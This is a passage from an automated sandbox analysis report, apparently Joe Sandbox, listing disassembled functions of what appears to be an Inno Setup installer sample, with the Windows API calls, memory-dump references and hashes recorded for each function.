                                                                  • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F352,?,?,00000000,0046F516,?,_is1,?), ref: 0046ECE7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID: NoModify
                                                                  • API String ID: 3702945584-1699962838
                                                                  • Opcode ID: 7eb4ab459c3921dc5338c7b3abf7fd5903c54a3e898984c04107b97a88657072
                                                                  • Instruction ID: 1140eb4c3ce40d11de990e217cdc8ecc45d3a806a677c2547659d4957ea667b8
                                                                  • Opcode Fuzzy Hash: 7eb4ab459c3921dc5338c7b3abf7fd5903c54a3e898984c04107b97a88657072
                                                                  • Instruction Fuzzy Hash: C6E04FB4640308BFEB04DB55DD4AF6AB7ECDB48724F104059BA049B280E674FE00C669
                                                                  Function 0042DE14 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                  Strings
                                                                  • System\CurrentControlSet\Control\Windows, xrefs: 0042DE2E
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Open
                                                                  • String ID: System\CurrentControlSet\Control\Windows
                                                                  • API String ID: 71445658-1109719901
                                                                  • Opcode ID: 3bdcab3ffa95dd7854a6d474c2ff8c4d7b332cac827883cc7250e5693ef667ec
                                                                  • Instruction ID: d7cc6eff87d81a3ef1983a0911a62a1ada5c46f4ff843c2b0821017aeb54f6c2
                                                                  • Opcode Fuzzy Hash: 3bdcab3ffa95dd7854a6d474c2ff8c4d7b332cac827883cc7250e5693ef667ec
                                                                  • Instruction Fuzzy Hash: 88D0C972910228BBEB00DE89DC41DFB77ADDB19760F45802AFD04AB241C6B4EC519BF8
                                                                  Function 0047DABC Relevance: 3.2, APIs: 2, Instructions: 160windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetACP.KERNEL32(?,?,00000001,00000000,0047DD9B,?,-0000001A,0047FC14,-00000010,?,00000004,0000001B,00000000,0047FF61,?,0045D988), ref: 0047DB32
                                                                    • Part of subcall function 0042E314: 73A1A570.USER32(00000000,00000000,0047FFC8,?,?,00000001,00000000,00000002,00000000,004808CA,?,?,?,?,?,004981E7), ref: 0042E323
                                                                    • Part of subcall function 0042E314: EnumFontsA.GDI32(?,00000000,0042E300,00000000,00000000,0042E36C,?,00000000,00000000,0047FFC8,?,?,00000001,00000000,00000002,00000000), ref: 0042E34E
                                                                    • Part of subcall function 0042E314: 73A1A480.USER32(00000000,?,0042E373,00000000,00000000,0042E36C,?,00000000,00000000,0047FFC8,?,?,00000001,00000000,00000002,00000000), ref: 0042E366
                                                                  • SendNotifyMessageA.USER32(000403E6,00000496,00002711,-00000001), ref: 0047DD02
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: A480A570EnumFontsMessageNotifySend
                                                                  • String ID:
                                                                  • API String ID: 2685184028-0
                                                                  • Opcode ID: 1699f4068c0c5867e7106ba40e3d9973070bda02754bb9a23a09a502d1616ce7
                                                                  • Instruction ID: 990e0cae6f69a79882f0940071147895bcf3dc4f71101f62f717fb2ce75f629c
                                                                  • Opcode Fuzzy Hash: 1699f4068c0c5867e7106ba40e3d9973070bda02754bb9a23a09a502d1616ce7
                                                                  • Instruction Fuzzy Hash: FD517074A101008BCB21EF26E98169637B9EF94308B50C57BA8499F367C778ED46CB9D
                                                                  Function 0042DEB8 Relevance: 3.1, APIs: 2, Instructions: 111registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFCE,?,?,00000008,00000000,00000000,0042DFFB), ref: 0042DF64
                                                                  • RegCloseKey.ADVAPI32(?,0042DFD5,?,00000000,00000000,00000000,00000000,00000000,0042DFCE,?,?,00000008,00000000,00000000,0042DFFB), ref: 0042DFC8
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseEnum
                                                                  • String ID:
                                                                  • API String ID: 2818636725-0
                                                                  • Opcode ID: 9f8261b046af4c0305013da9979aadb613cc1e3f6400fb4ebe2b883e54c4606e
                                                                  • Instruction ID: c872a63f9528d4f9380aaceb5e2d891e8c563da0940016be03c3acb485ce214c
                                                                  • Opcode Fuzzy Hash: 9f8261b046af4c0305013da9979aadb613cc1e3f6400fb4ebe2b883e54c4606e
                                                                  • Instruction Fuzzy Hash: A8319370F04258AEDB11DFA6DD42BBFBBB9EB49304F92447BE401E6281D6385E01CA1D
                                                                  Function 004527BC Relevance: 3.1, APIs: 2, Instructions: 60processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateProcessA.KERNEL32(00000000,00000000,?,?,00458098,00000000,00458080,?,?,?,00000000,00452836,?,?,?,00000001), ref: 00452810
                                                                  • GetLastError.KERNEL32(00000000,00000000,?,?,00458098,00000000,00458080,?,?,?,00000000,00452836,?,?,?,00000001), ref: 00452818
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CreateErrorLastProcess
                                                                  • String ID:
                                                                  • API String ID: 2919029540-0
                                                                  • Opcode ID: e0555b4cbc397befea5ce91cbbea4dedbfe526bfc705885143054cd240055755
                                                                  • Instruction ID: e9b66965f7ed38539142cc2995e542ed63b4c0771d7d6ba66a5e4ac3981b0267
                                                                  • Opcode Fuzzy Hash: e0555b4cbc397befea5ce91cbbea4dedbfe526bfc705885143054cd240055755
                                                                  • Instruction Fuzzy Hash: 70113C72604608AF8B50DEADDD41D9FB7ECEB4D310B114567FD18D3241D674AD148BA8
                                                                  Function 0040AFC0 Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AFDA
                                                                  • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B137,00000000,0040B14F,?,?,?,00000000), ref: 0040AFEB
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindFree
                                                                  • String ID:
                                                                  • API String ID: 4097029671-0
                                                                  • Opcode ID: bd4d08f36a9d4a560adef0fa1bde098128f2b715f965cb3459cef9598ac6c158
                                                                  • Instruction ID: aeeba5ce467f8effdb78304bcd792b874f75604bed8582862ca5d9c37e282381
                                                                  • Opcode Fuzzy Hash: bd4d08f36a9d4a560adef0fa1bde098128f2b715f965cb3459cef9598ac6c158
                                                                  • Instruction Fuzzy Hash: CE01DF71700700AFDB14EF65AC92A1B77ADDB4A714B11807AF400AB3D1DA39AC019AA9
                                                                  Function 0041EE9C Relevance: 3.0, APIs: 2, Instructions: 49threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 0041EEEB
                                                                  • 73A25940.USER32(00000000,0041EE4C,00000000,00000000,0041EF08,?,00000000,0041EF3F,?,0042EEA8,?,00000001), ref: 0041EEF1
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: A25940CurrentThread
                                                                  • String ID:
                                                                  • API String ID: 2655091166-0
                                                                  • Opcode ID: b000ad2c2d45302efb537f6ed51b85bb3a5cc49cf8a353236d3522148df1097f
                                                                  • Instruction ID: ec06e6b8def62778297c6a117e91140491810bf1675edd7fb5fc45fb14f34894
                                                                  • Opcode Fuzzy Hash: b000ad2c2d45302efb537f6ed51b85bb3a5cc49cf8a353236d3522148df1097f
                                                                  • Instruction Fuzzy Hash: D9015B76A04604BFD706CF6BDC1199ABBE8E789720B22887BEC04D3690E6355810DF18
                                                                  Function 00452C54 Relevance: 3.0, APIs: 2, Instructions: 48fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MoveFileA.KERNEL32(00000000,00000000), ref: 00452C96
                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,00452CBC), ref: 00452C9E
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastMove
                                                                  • String ID:
                                                                  • API String ID: 55378915-0
                                                                  • Opcode ID: 4b3f53bb71bbb3de239a758d95ad3dd7b2750d400091be83cb52db7a615a65e0
                                                                  • Instruction ID: 72322736c602c8c7a1920fbe291f5aeb87443d44c1116871956ce6e3077d7411
                                                                  • Opcode Fuzzy Hash: 4b3f53bb71bbb3de239a758d95ad3dd7b2750d400091be83cb52db7a615a65e0
                                                                  • Instruction Fuzzy Hash: C9012671B00604AB8B01EB799D4189EB7ECDB4A32575045BBFC14E3343EA784E04456C
                                                                  Function 00452744 Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527A3), ref: 0045277D
                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,004527A3), ref: 00452785
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDirectoryErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1375471231-0
                                                                  • Opcode ID: 9ee879c615aac4fee22e4c99406f95e71c245cbd6d77cc6155be40721354894d
                                                                  • Instruction ID: e798b8fcaf2c893210dd6dd972d3083c0fc79cae1e6532b7171fe4e83a13409b
                                                                  • Opcode Fuzzy Hash: 9ee879c615aac4fee22e4c99406f95e71c245cbd6d77cc6155be40721354894d
                                                                  • Instruction Fuzzy Hash: E1F02871A04604BFCB00EF759E4159EB3E8DB0E721B1045B7FC04E3242E7B94E048598
                                                                  Function 00423234 Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 00423241
                                                                  • LoadCursorA.USER32(00000000,00000000), ref: 0042326B
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CursorLoad
                                                                  • String ID:
                                                                  • API String ID: 3238433803-0
                                                                  • Opcode ID: 57390d314a1cb7161e6ddc30cf2ec12f57c29d9a020bc84e90da4252d8f033e1
                                                                  • Instruction ID: 59516fef74be350ba7f17c0e511b54e8d6c2303d910d3728eb6a55db14448276
                                                                  • Opcode Fuzzy Hash: 57390d314a1cb7161e6ddc30cf2ec12f57c29d9a020bc84e90da4252d8f033e1
                                                                  • Instruction Fuzzy Hash: 68F0271170421066D6109E3E6CC0A6B72A8DF82335B71037BFB3EC72D1CA2E1D414569
                                                                  Function 0042E38C Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00008000), ref: 0042E396
                                                                  • LoadLibraryA.KERNEL32(00000000,00000000,0042E3E0,?,00000000,0042E3FE,?,00008000), ref: 0042E3C5
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLibraryLoadMode
                                                                  • String ID:
                                                                  • API String ID: 2987862817-0
                                                                  • Opcode ID: 5e1e313bdd13d7489a01f7e50f084508f9c5c97fde52d832d9963c9b8019f2bb
                                                                  • Instruction ID: aa33dc687cd71512c069df69893670fc4fcbad3b08ca7d4395289e8ee6212cdb
                                                                  • Opcode Fuzzy Hash: 5e1e313bdd13d7489a01f7e50f084508f9c5c97fde52d832d9963c9b8019f2bb
                                                                  • Instruction Fuzzy Hash: 13F08270714B44BFDB019F779CA282BBBECEB49B1179249B6FD00A3691E53C5910C928
                                                                  Function 004162C2 Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetClassInfoA.USER32(00400000,?,?), ref: 004162D9
                                                                  • GetClassInfoA.USER32(00000000,?,?), ref: 004162E9
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ClassInfo
                                                                  • String ID:
                                                                  • API String ID: 3534257612-0
                                                                  • Opcode ID: 0cefddb0d68ec1ee3d6e09aa9ac37d408dcb608ad702880eba3eeb66fdb88c2a
                                                                  • Instruction ID: 6cd5cb93a67b39dfae17eda9b7884797c0ece5161c54fd1178b0752c2523ee83
                                                                  • Opcode Fuzzy Hash: 0cefddb0d68ec1ee3d6e09aa9ac37d408dcb608ad702880eba3eeb66fdb88c2a
                                                                  • Instruction Fuzzy Hash: C7E01AB26015146EE710DFA89D81EE73BDCDB08350B2201B7FE08CB246D3A4DD008BA8
                                                                  Function 004508CC Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,0046FF69,?,00000000), ref: 004508E2
                                                                  • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,0046FF69,?,00000000), ref: 004508EA
                                                                    • Part of subcall function 00450688: GetLastError.KERNEL32(004504A4,0045074A,?,00000000,?,00497338,00000001,00000000,00000002,00000000,00497499,?,?,00000005,00000000,004974CD), ref: 0045068B
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$FilePointer
                                                                  • String ID:
                                                                  • API String ID: 1156039329-0
                                                                  • Opcode ID: b81912fe9410729738c8cc3b4427c31e6f6ea190abe7f97a6bc74282f8b5003d
                                                                  • Instruction ID: 7f4ce0808efc90522886b7fd4f7afe0cb5ca5dcd319eb65f5abb6fc959a7204b
                                                                  • Opcode Fuzzy Hash: b81912fe9410729738c8cc3b4427c31e6f6ea190abe7f97a6bc74282f8b5003d
                                                                  • Instruction Fuzzy Hash: BDE012A93542005FE700FA7589C1F2B22DCDB44315F00846AF945CA183D678CC054B69
                                                                  Function 0040625C Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Global$AllocLock
                                                                  • String ID:
                                                                  • API String ID: 15508794-0
                                                                  • Opcode ID: 38fdb687bb69d238822be17628ba02d3430ff360103c12c92fad93c094244837
                                                                  • Instruction ID: 06179efae1cd4c7c45065c0f91b58358bdd8bb936cab03a6fa385f12497be06a
                                                                  • Opcode Fuzzy Hash: 38fdb687bb69d238822be17628ba02d3430ff360103c12c92fad93c094244837
                                                                  • Instruction Fuzzy Hash: 3E9002C4D10B00B8DC0072B20C1AD3F146CD8C172D3D0486F7004B61C3883C88004839
                                                                  Function 004014E4 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$AllocFree
                                                                  • String ID:
                                                                  • API String ID: 2087232378-0
                                                                  • Opcode ID: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                  • Instruction ID: 119661fe7174a079321c86e78af40791ac039b5eb8373b45468023a5ba433726
                                                                  • Opcode Fuzzy Hash: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                  • Instruction Fuzzy Hash: F7F08272A0063067EB60596A4C81B5359859BC5B94F154076FD09FF3E9D6B58C0142A9
                                                                  Function 004085CC Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSystemDefaultLCID.KERNEL32(00000000,00408702), ref: 004085EB
                                                                    • Part of subcall function 00406DDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406DF9
                                                                    • Part of subcall function 00408558: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408623,?,00000000,00408702), ref: 00408576
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: DefaultInfoLoadLocaleStringSystem
                                                                  • String ID:
                                                                  • API String ID: 1658689577-0
                                                                  • Opcode ID: e0f2d7fee364d4b50c904546fee583fee48e6df64a24fbccf64ec24177fbbbf9
                                                                  • Instruction ID: bd6209dc85efa73f9a721b4ecfe58d49d0953a842630d38ee12c0cb785ae99e6
                                                                  • Opcode Fuzzy Hash: e0f2d7fee364d4b50c904546fee583fee48e6df64a24fbccf64ec24177fbbbf9
                                                                  • Instruction Fuzzy Hash: 1E314075E0011D9BCB01EF95C8819EEB779EF84314F518577E819BB386E738AE018B98
                                                                  Function 0041FB94 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC31
